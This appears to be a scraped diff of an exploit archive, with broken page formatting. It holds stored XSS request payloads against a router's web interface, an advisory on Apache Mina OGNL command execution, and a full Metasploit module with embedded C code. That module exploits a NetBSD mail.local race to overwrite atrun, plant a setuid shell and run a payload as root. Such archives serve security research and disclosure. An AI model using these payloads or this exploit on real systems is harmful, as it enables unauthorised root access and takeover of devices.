||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 10741
|
||||
(...)
|
||||
<select name="AllowedDomainList" size=5>
|
||||
<option value="1"><script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Quick_setup HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Quick_setup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 371
|
||||
|
||||
Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Quick_setup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Wireless.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Quick_setup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 51653
|
||||
(...)
|
||||
<tr>
|
||||
<td>
|
||||
<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
|
||||
</td>
|
||||
<td colspan="2">
|
||||
<script>alert('XSS')</script>
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
13. Stored XSS in DDNS Settings (Setup -> DDNS)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Setup_DDNS HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Setup_DDNS.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 154
|
||||
|
||||
DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Setup_DDNS.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Setup_DDNS.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Setup_DDNS.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 5738
|
||||
(...)
|
||||
<td>
|
||||
<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
|
||||
</td>
|
||||
(...)
|
||||
<td>
|
||||
<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
|
||||
</td>
|
||||
(...)
|
||||
|
||||
|
||||
14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/vpn_adv HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/vpn_adv.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 286
|
||||
|
||||
NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/vpn_adv.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /vpn_adv.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/vpn_adv.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 10179
|
||||
(...)
|
||||
<td>
|
||||
<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
|
||||
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
|
||||
<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
|
||||
</td>
|
||||
(...)
|
||||
<tr>
|
||||
<td>
|
||||
<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
|
||||
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
|
||||
<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
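--- a/platforms/java/webapps/40384.txt
+++ b/platforms/java/webapps/40384.txt
@@ -0,0 +1,33 @@
+Apache Mina 2.0.13 - Remote Command Execution
+
+Abstract
+
+Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
+
+Description
+
+The function “find” in the “IoSessionFinder” class executes an arbitrary OGNL expression (Ognl.getValue(….)) defined in its constructor.
+
+
+
+Conclusion
+
+This vulnerability shows that Expression languages vulnerabilities are still present in Java libraries and can have a big impact even if it is in this case the vulnerability can only exploited in specific conditions.
+
+Regarding the fix, the Apache Mina team didn't request a CVE neither acknowledged the vulnerability but I confirm that the vulnerability is fixed is the last version.
+
+Timelines
+
+30/03/2016: First email to disclose the vulnerability to the Apache Security Team
+31/03/2016: Acknowledgment from the Apache Mina team for the email reception and saying the vulnerability is under investigation
+21/05/2016: Email from the Apache Mina saying that they look for possible remediations
+12/08/2016: Email from the Apache Mina suggesting a solution
+29/08/2016: Email from my side saying that the remediation looks good
+30/08/2016: Apache Mina team published the new version fixing the issue.
+
+
+PS: I have included two archives containing the two proofs of concept.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40384.zip
+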
330
platforms/netbsd_x86/local/40385.rb
Executable file
|
@ -0,0 +1,330 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NetBSD mail.local Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit a race condition in mail.local with SUID bit set on:
|
||||
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
|
||||
NetBSD 6.1 - 6.1.5
|
||||
NetBSD 6.0 - 6.0.6
|
||||
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@stcyrsecurity.com>', # Module
|
||||
'akat1' # Discovery
|
||||
],
|
||||
|
||||
'DisclosureDate' => 'Jul 07 2016',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'SessionTypes' => %w{shell meterpreter},
|
||||
'Privileged' => true,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic openssl'
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
|
||||
'References' =>
|
||||
[
|
||||
[ "URL", "http://akat1.pl/?id=2"],
|
||||
[ "EDB", "40141"],
|
||||
[ "CVE", "2016-6253"],
|
||||
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
|
||||
]
|
||||
))
|
||||
register_options([
|
||||
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
|
||||
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# lots of this file's format is based on pkexec.rb
|
||||
|
||||
# direct copy of code from exploit-db
|
||||
main = %q{
|
||||
// Source: http://akat1.pl/?id=2
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <signal.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <err.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
#define ATRUNPATH "/usr/libexec/atrun"
|
||||
#define MAILDIR "/var/mail"
|
||||
|
||||
static int
|
||||
overwrite_atrun(void)
|
||||
{
|
||||
char *script = "#! /bin/sh\n"
|
||||
"cp /bin/ksh /tmp/ksh\n"
|
||||
"chmod +s /tmp/ksh\n";
|
||||
size_t size;
|
||||
FILE *fh;
|
||||
int rv = 0;
|
||||
|
||||
fh = fopen(ATRUNPATH, "wb");
|
||||
|
||||
if (fh == NULL) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
size = strlen(script);
|
||||
if (size != fwrite(script, 1, strlen(script), fh)) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
out:
|
||||
if (fh != NULL && fclose(fh) != 0)
|
||||
rv = -1;
|
||||
|
||||
return rv;
|
||||
}
|
||||
|
||||
static int
|
||||
copy_file(const char *from, const char *dest, int create)
|
||||
{
|
||||
char buf[1024];
|
||||
FILE *in = NULL, *out = NULL;
|
||||
size_t size;
|
||||
int rv = 0, fd;
|
||||
|
||||
in = fopen(from, "rb");
|
||||
if (create == 0)
|
||||
out = fopen(dest, "wb");
|
||||
else {
|
||||
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
|
||||
if (fd == -1) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
out = fdopen(fd, "wb");
|
||||
}
|
||||
|
||||
if (in == NULL || out == NULL) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
|
||||
if (fwrite(&buf, 1, size, in) != 0) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
}
|
||||
|
||||
out:
|
||||
if (in != NULL && fclose(in) != 0)
|
||||
rv = -1;
|
||||
if (out != NULL && fclose(out) != 0)
|
||||
rv = -1;
|
||||
return rv;
|
||||
}
|
||||
|
||||
int
|
||||
main()
|
||||
{
|
||||
pid_t pid;
|
||||
uid_t uid;
|
||||
struct stat sb;
|
||||
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
|
||||
|
||||
umask(0077);
|
||||
|
||||
login = getlogin();
|
||||
|
||||
if (login == NULL)
|
||||
err(EXIT_FAILURE, "who are you?");
|
||||
|
||||
uid = getuid();
|
||||
|
||||
asprintf(&mailbox, MAILDIR "/%s", login);
|
||||
|
||||
if (mailbox == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
if (access(mailbox, F_OK) != -1) {
|
||||
/* backup mailbox */
|
||||
asprintf(&mailbox_backup, "/tmp/%s", login);
|
||||
if (mailbox_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
}
|
||||
|
||||
if (mailbox_backup != NULL) {
|
||||
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
|
||||
if (copy_file(mailbox, mailbox_backup, 1))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* backup atrun(1) */
|
||||
atrun_backup = strdup("/tmp/atrun");
|
||||
if (atrun_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
|
||||
|
||||
if (copy_file(ATRUNPATH, atrun_backup, 1))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
/* win the race */
|
||||
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
|
||||
|
||||
switch (pid = fork()) {
|
||||
case -1:
|
||||
err(EXIT_FAILURE, NULL);
|
||||
/* NOTREACHED */
|
||||
case 0:
|
||||
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
|
||||
"2> /dev/null", login);
|
||||
|
||||
for(;;)
|
||||
system(buf);
|
||||
/* NOTREACHED */
|
||||
|
||||
default:
|
||||
umask(0022);
|
||||
for(;;) {
|
||||
int fd;
|
||||
unlink(mailbox);
|
||||
symlink(ATRUNPATH, mailbox);
|
||||
sync();
|
||||
unlink(mailbox);
|
||||
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
|
||||
close(fd);
|
||||
sync();
|
||||
if (lstat(ATRUNPATH, &sb) == 0) {
|
||||
if (sb.st_uid == uid) {
|
||||
kill(pid, 9);
|
||||
fprintf(stderr, "[+] won race!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
break;
|
||||
}
|
||||
(void)waitpid(pid, NULL, 0);
|
||||
|
||||
if (mailbox_backup != NULL) {
|
||||
/* restore mailbox */
|
||||
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
|
||||
|
||||
if (copy_file(mailbox_backup, mailbox, 0))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(mailbox_backup) != 0)
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* overwrite atrun */
|
||||
fprintf(stderr, "[+] overwriting atrun(1)\n");
|
||||
|
||||
if (chmod(ATRUNPATH, 0755) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
if (overwrite_atrun())
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
|
||||
|
||||
for(;;sleep(1)) {
|
||||
if (access("/tmp/ksh", F_OK) != -1)
|
||||
break;
|
||||
}
|
||||
|
||||
/* restore atrun */
|
||||
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
|
||||
|
||||
if (copy_file(atrun_backup, ATRUNPATH, 0))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(atrun_backup) != 0)
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
if (chmod(ATRUNPATH, 0555) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
|
||||
"ownership.\n");
|
||||
fprintf(stderr, "Enjoy your shell:\n");
|
||||
|
||||
execl("/tmp/ksh", "ksh", NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
# patch in our variable maildir and atrunpath
|
||||
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
|
||||
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
|
||||
main.gsub!(/#define MAILDIR "\/var\/mail"/,
|
||||
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
|
||||
|
||||
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
|
||||
payload_file = "#{rand_text_alpha(8)}"
|
||||
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
|
||||
vprint_status("Writing Payload to #{payload_path}")
|
||||
# patch in to run our payload as part of ksh
|
||||
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
|
||||
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
|
||||
|
||||
write_file(payload_path, payload.encoded)
|
||||
cmd_exec("chmod 555 #{payload_path}")
|
||||
register_file_for_cleanup(payload_path)
|
||||
|
||||
print_status "Writing exploit to #{executable_path}.c"
|
||||
|
||||
# clean previous bad attempts to prevent c code from exiting
|
||||
rm_f executable_path
|
||||
rm_f '/tmp/atrun'
|
||||
whoami = cmd_exec('whoami')
|
||||
rm_f "/tmp/#{whoami}"
|
||||
|
||||
write_file("#{executable_path}.c", main)
|
||||
print_status("Compiling #{executable_path}.c via gcc")
|
||||
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
print_status('Starting the payload handler...')
|
||||
handler({})
|
||||
|
||||
print_status("Executing at #{Time.now}. May take up to 10min for callback")
|
||||
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
# our sleep timer
|
||||
stime = Time.now.to_f
|
||||
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
|
||||
Rex.sleep(1)
|
||||
end
|
||||
print_status("#{Time.now}")
|
||||
register_file_for_cleanup(executable_path)
|
||||
register_file_for_cleanup("#{executable_path}.out")
|
||||
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
|
||||
end
|
||||
end
|